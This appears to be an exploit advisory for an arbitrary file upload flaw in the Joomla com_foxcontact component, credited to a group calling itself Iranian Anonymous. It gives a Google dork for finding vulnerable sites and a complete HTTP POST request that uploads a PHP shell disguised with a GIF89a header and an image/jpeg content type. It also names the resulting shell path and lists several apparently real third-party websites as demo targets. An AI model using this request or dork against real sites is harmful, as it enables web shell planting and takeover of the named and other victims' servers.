########################## # Exploit Title: Joomla Component Arbitrary File Upload shell Vulnerability # Dork Google: allinurl:index.php?option=com_foxcontact # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # vendor Home: http://www.fox.ra.it/ # Version: 1.0 # Tested on : Linux-Windows7 ########################## # Exploit -HTTP Header Example- POST http://www.cavedegruissan.com/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1 Host: www.cavedegruissan.com User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-File-Name: shell.php Content-Type: image/jpeg Connection: keep-alive Pragma: no-cache Cache-Control: no-cache GIF89a<?php shell ?> ############################ Shell path: www.site.com/components/com_foxcontact/uploads/filename.php ########################### Demo : http://www.cavedegruissan.com/component/hikashop/FT/index.php?option=com_foxcontact&view=foxcontact&Itemid=131 http://www.nebulaagencies.com.au/index.php?option=com_foxcontact&view=foxcontact&Itemid=113 ############################## #Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd ||Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous . # Discovered By: Hacker Khan